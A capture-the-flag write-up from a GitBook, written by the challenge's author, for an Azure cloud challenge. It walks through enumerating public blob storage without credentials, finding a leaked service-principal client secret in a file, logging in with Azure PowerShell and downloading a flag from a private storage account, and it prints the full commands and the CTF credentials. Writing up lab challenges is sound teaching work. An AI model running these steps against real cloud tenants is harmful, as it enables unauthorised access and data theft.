Kabinet's GitBook
  • 🚩Kabinet CTF's Writeups
  • Page
  • 2025
    • Thuderdome
      • Emerge through the breach
      • Pulled from the sky
      • An absent defense
      • A new wave (web of deceit)
      • Crossing the great divide
      • Joining forces as one
      • Infiltrate (open the gate)
      • Jaeger
      • Victory
  • 2024
    • GreyCTF 2024
      • Markdown Parser
      • Fearless Concurrency
      • GreyCTF Survey
      • Baby Web
      • Beautiful Styles
      • All About Timing
      • Poly Playground
    • TetCTF 2024
      • Hello from API GW
      • Microservices
  • 2023
    • BSidesSF Cloud Village CTF
      • Tony Tony Tony
      • Plain Sight
      • A Suit of Armor Around The World
      • Sharing is Caring + Sequel
      • Photo Drive
    • DART CTF
      • Flag 1
      • Flag 2
      • Flag 3
      • Flag 4
      • Flag 5
      • Flag 6
      • Flag 7
      • Flag 8
      • Flag 9
      • Flag 10
    • EKS Cluster Games
    • Big IAM Challenge
  • 2022
    • Stack The Flag
      • Secret of Meow Olympurr
  • Authored
    • Cyber League 2025 Major 1
      • Perfect Storage
      • catalog commits
      • pawtainer hub
    • Lag and Crash 2023
      • Managed Secrets
      • Pickle Rick
      • Cloudy with a chance of meatball
    • NYP InfoSec December CTF 2022
      • Super Secure Technology Infrastructure
      • Self Introduction
      • Aww Cuter Cat
      • Obligatory Calc
      • BreadSecurity
  • NYP InfoSec Introduction to Pentesting Workshop
Powered by GitBook
On this page

Was this helpful?

  1. Authored
  2. Lag and Crash 2023

Cloudy with a chance of meatball

PreviousPickle RickNextNYP InfoSec December CTF 2022

Last updated 2 months ago

Was this helpful?

Difficulty
Points
Solves

Medium

500

3

Description

Today in school, I learnt to code in HTML! View my brand new website! www.lncctf2023.tk Hint 1: Identify how the website is hosted using what services

Hint 2: Enumerate your role and the allowed actions

Viewing the website, we can identify that it is hosted on some azure services

Since there isnt much information, other than the domain name, we can use MicroBurst to perform unauthenticated enumeration.

Refering to HackTricks

From the MicroBurst output, I have identified 2 files, /private/instructions.txt and /root/flag.txt

The /root/flag.txt shows a troll flag but /private/instructions.txt has some juicy information.

instructions.txt
Note to self:

Credentials for accessing the tenant. 
Hopefully no one can see this...

Tenant ID: c11b22d2-d015-47e0-bc0b-e6a0b1e25993
Application ID: ee767510-7041-4930-a672-1217ff9ff51a
Client Secret: pnh8Q~g~.gDOjPHNDNSGq7dFBUkjEMQ1I5HJydaQ

Since I have a set of credentials, we are able to use Azure PowerShell module to login with the service principal

$appid="ee767510-7041-4930-a672-1217ff9ff51a"
$secret="pnh8Q~g~.gDOjPHNDNSGq7dFBUkjEMQ1I5HJydaQ"

$tid= 'c11b22d2-d015-47e0-bc0b-e6a0b1e25993'

$creds = (ConvertTo-SecureString $secret -AsPlainText -Force)
$creds = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $appid,$creds

Connect-AzAccount -ServicePrincipal -TenantId $tid -Credential $creds

Next, I can enumerate the resources our service principal has access to using Get-AzResource

I manage to identify that there is another storage account called lncctf2023private. I am then able to retrieve the flag from the private storage account

$rg="lncctf2023_cloudy_meatball_rg"
$saname="lncctf2023private"
$sa = Get-AzStorageAccount -ResourceGroupName $rg -StorageAccountName $saname
$ctx = $sa.Context

Get-AzStorageContainer -Context $ctx
Get-AzStorageBlob -Context $ctx -Container flag
Get-AzStorageBlobContent -Blob flag.txt -Container flag -Destination flag.txt -Context $ctx

Flag: LNC2023{aZuR3_pUbL1C_c0ntAiN3R_i3_n0T_s0_s3cuR3}

LogoAz - Unauthenticated Enum & Initial EntryHackTricks Cloud